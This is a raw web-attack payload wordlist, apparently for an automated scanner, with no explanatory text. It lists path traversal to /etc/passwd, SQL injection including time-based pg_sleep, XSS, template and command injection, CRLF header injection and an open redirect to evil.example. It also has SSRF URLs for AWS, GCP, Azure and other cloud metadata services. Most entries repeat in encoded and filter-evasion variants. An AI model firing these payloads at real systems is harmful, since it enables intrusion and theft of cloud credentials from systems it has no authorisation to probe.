/admin
/login
/dashboard
/api
/api/v1
/status
/debug
/health
/metrics
/cloud
/cloud/status
/cloud/debug
/api/cloud
/cloud?test=1
test
baseline
AUROSE_PROBE
../../../../etc/passwd
..\..\..\..\windows\win.ini
' OR '1'='1
" OR "1"="1
<script>alert(1)</script>
${7*7}
{{7*7}}
`id`
127.0.0.1
http://127.0.0.1
https://example.com
%2Fadmin
%2Flogin
%2Fdashboard
%2Fapi
%2Fapi%2Fv1
%2Fstatus
%2Fdebug
%2Fhealth
%2Fmetrics
%2Fcloud
%2Fcloud%2Fstatus
%2Fcloud%2Fdebug
%2Fapi%2Fcloud
%2Fcloud%3Ftest%3D1
..%2F..%2F..%2F..%2Fetc%2Fpasswd
..%5C..%5C..%5C..%5Cwindows%5Cwin.ini
%27%20OR%20%271%27%3D%271
%22%20OR%20%221%22%3D%221
%3Cscript%3Ealert%281%29%3C%2Fscript%3E
%24%7B7%2A7%7D
%7B%7B7%2A7%7D%7D
%60id%60
http%3A%2F%2F127.0.0.1
https%3A%2F%2Fexample.com
/ADMIN
/LOGIN
/DASHBOARD
/API
/API/V1
/STATUS
/DEBUG
/HEALTH
/METRICS
/CLOUD
/CLOUD/STATUS
/CLOUD/DEBUG
/API/CLOUD
/CLOUD?TEST=1
TEST
BASELINE
../../../../ETC/PASSWD
..\..\..\..\WINDOWS\WIN.INI
<SCRIPT>ALERT(1)</SCRIPT>
`ID`
HTTP://127.0.0.1
HTTPS://EXAMPLE.COM
%2FADMIN
%2FLOGIN
%2FDASHBOARD
%2FAPI
%2FAPI%2FV1
%2FSTATUS
http://169.254.169.254/latest/meta-data/
http%3A%2F%2F169.254.169.254%2Flatest%2Fmeta-data%2F
http%253A%252F%252F169.254.169.254%252Flatest%252Fmeta-data%252F
HTTP://169.254.169.254/LATEST/META-DATA/
http://169.254.169.254/latest/meta-data/?aurose=1
http://169.254.169.254/latest/meta-data/&aurose=1
http://metadata.google.internal/computeMetadata/v1/
http%3A%2F%2Fmetadata.google.internal%2FcomputeMetadata%2Fv1%2F
http%253A%252F%252Fmetadata.google.internal%252FcomputeMetadata%252Fv1%252F
HTTP://METADATA.GOOGLE.INTERNAL/COMPUTEMETADATA/V1/
http://metadata.google.internal/computeMetadata/v1/?aurose=1
http://metadata.google.internal/computeMetadata/v1/&aurose=1
http://100.100.100.200/latest/meta-data/
http%3A%2F%2F100.100.100.200%2Flatest%2Fmeta-data%2F
http%253A%252F%252F100.100.100.200%252Flatest%252Fmeta-data%252F
HTTP://100.100.100.200/LATEST/META-DATA/
http://100.100.100.200/latest/meta-data/?aurose=1
http://100.100.100.200/latest/meta-data/&aurose=1
https://s3.amazonaws.com/
https%3A%2F%2Fs3.amazonaws.com%2F
https%253A%252F%252Fs3.amazonaws.com%252F
HTTPS://S3.AMAZONAWS.COM/
https://s3.amazonaws.com/?aurose=1
https://s3.amazonaws.com/&aurose=1
https://storage.googleapis.com/
https%3A%2F%2Fstorage.googleapis.com%2F
https%253A%252F%252Fstorage.googleapis.com%252F
HTTPS://STORAGE.GOOGLEAPIS.COM/
https://storage.googleapis.com/?aurose=1
https://storage.googleapis.com/&aurose=1
http://169.254.170.2/v2/metadata
http%3A%2F%2F169.254.170.2%2Fv2%2Fmetadata
http%253A%252F%252F169.254.170.2%252Fv2%252Fmetadata
HTTP://169.254.170.2/V2/METADATA
http://169.254.170.2/v2/metadata?aurose=1
http://169.254.170.2/v2/metadata&aurose=1
http://169.254.169.254/metadata/instance?api-version=2021-02-01
http%3A%2F%2F169.254.169.254%2Fmetadata%2Finstance%3Fapi-version%3D2021-02-01
http%253A%252F%252F169.254.169.254%252Fmetadata%252Finstance%253Fapi-version%253D2021-02-01
http://169.254.169.254/metadata/instance?api-version%3d2021-02-01
HTTP://169.254.169.254/METADATA/INSTANCE?API-VERSION=2021-02-01
http://169.254.169.254/metadata/instance?api-version=2021-02-01?aurose=1
http://169.254.169.254/metadata/instance?api-version=2021-02-01&aurose=1
http://metadata/computeMetadata/v1/
http%3A%2F%2Fmetadata%2FcomputeMetadata%2Fv1%2F
http%253A%252F%252Fmetadata%252FcomputeMetadata%252Fv1%252F
HTTP://METADATA/COMPUTEMETADATA/V1/
http://metadata/computeMetadata/v1/?aurose=1
http://metadata/computeMetadata/v1/&aurose=1
%2527%2520OR%2520%25271%2527%253D%25271
'/**/OR/**/'1'='1
' OR '1'%3d'1
' OR '1'='1?aurose=1
' OR '1'='1&aurose=1
%2522%2520OR%2520%25221%2522%253D%25221
"/**/OR/**/"1"="1
" OR "1"%3d"1
" OR "1"="1?aurose=1
" OR "1"="1&aurose=1
' AND 1=1 --
%27%20AND%201%3D1%20--
%2527%2520AND%25201%253D1%2520--
'/**/AND/**/1=1/**/--
' AND 1%3d1 --
' AND 1=1 --?aurose=1
' AND 1=1 --&aurose=1
' AND 1=2 --
%27%20AND%201%3D2%20--
%2527%2520AND%25201%253D2%2520--
'/**/AND/**/1=2/**/--
' AND 1%3d2 --
' AND 1=2 --?aurose=1
' AND 1=2 --&aurose=1
..%252F..%252F..%252F..%252Fetc%252Fpasswd
../../../../etc/passwd?aurose=1
../../../../etc/passwd&aurose=1
..%255C..%255C..%255C..%255Cwindows%255Cwin.ini
..\..\..\..\windows\win.ini?aurose=1
..\..\..\..\windows\win.ini&aurose=1
%2524%257B7%252A7%257D
${7*7}?aurose=1
${7*7}&aurose=1
%257B%257B7%252A7%257D%257D
{{7*7}}?aurose=1
{{7*7}}&aurose=1
<script>alert(document.domain)</script>
%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
%253Cscript%253Ealert%2528document.domain%2529%253C%252Fscript%253E
<SCRIPT>ALERT(DOCUMENT.DOMAIN)</SCRIPT>
<script>alert(document.domain)</script>?aurose=1
<script>alert(document.domain)</script>&aurose=1
';SELECT pg_sleep(2)--
%27%3BSELECT%20pg_sleep%282%29--
%2527%253BSELECT%2520pg_sleep%25282%2529--
';SELECT/**/pg_sleep(2)--
';SELECT PG_SLEEP(2)--
';SELECT pg_sleep(2)--?aurose=1
';SELECT pg_sleep(2)--&aurose=1
%2560id%2560
`id`?aurose=1
`id`&aurose=1
$(id)
%24%28id%29
%2524%2528id%2529
$(ID)
$(id)?aurose=1
$(id)&aurose=1
${IFS}
%24%7BIFS%7D
%2524%257BIFS%257D
${IFS}?aurose=1
${IFS}&aurose=1
%0d%0aX-Aurose: 1
%250d%250aX-Aurose%3A%201
%25250d%25250aX-Aurose%253A%25201
%0d%0aX-Aurose:/**/1
%0D%0AX-AUROSE: 1
%0d%0aX-Aurose: 1?aurose=1
%0d%0aX-Aurose: 1&aurose=1
https://example.com/?next=https://evil.example
https%3A%2F%2Fexample.com%2F%3Fnext%3Dhttps%3A%2F%2Fevil.example
https%253A%252F%252Fexample.com%252F%253Fnext%253Dhttps%253A%252F%252Fevil.example
https://example.com/?next%3dhttps://evil.example
HTTPS://EXAMPLE.COM/?NEXT=HTTPS://EVIL.EXAMPLE
https://example.com/?next=https://evil.example?aurose=1
https://example.com/?next=https://evil.example&aurose=1
http://169.254.169.254/latest/meta-data/::var0
http%3A%2F%2F169.254.169.254%2Flatest%2Fmeta-data%2F::v0
/cloud/probe/0
http://metadata.google.internal/computeMetadata/v1/::var1
http%3A%2F%2Fmetadata.google.internal%2FcomputeMetadata%2Fv1%2F::v1
/cloud/probe/1
http://100.100.100.200/latest/meta-data/::var2
http%3A%2F%2F100.100.100.200%2Flatest%2Fmeta-data%2F::v2
/cloud/probe/2
https://s3.amazonaws.com/::var3
https%3A%2F%2Fs3.amazonaws.com%2F::v3
/cloud/probe/3
https://storage.googleapis.com/::var4
https%3A%2F%2Fstorage.googleapis.com%2F::v4
/cloud/probe/4
http://169.254.170.2/v2/metadata::var5
http%3A%2F%2F169.254.170.2%2Fv2%2Fmetadata::v5
/cloud/probe/5
http://169.254.169.254/metadata/instance?api-version=2021-02-01::var6
http%3A%2F%2F169.254.169.254%2Fmetadata%2Finstance%3Fapi-version%3D2021-02-01::v6
/cloud/probe/6
http://metadata/computeMetadata/v1/::var7
http%3A%2F%2Fmetadata%2FcomputeMetadata%2Fv1%2F::v7
/cloud/probe/7
' OR '1'='1::var8
%27%20OR%20%271%27%3D%271::v8
/cloud/probe/8
" OR "1"="1::var9
%22%20OR%20%221%22%3D%221::v9
/cloud/probe/9
' AND 1=1 --::var10
%27%20AND%201%3D1%20--::v10
/cloud/probe/10
' AND 1=2 --::var11
%27%20AND%201%3D2%20--::v11
/cloud/probe/11
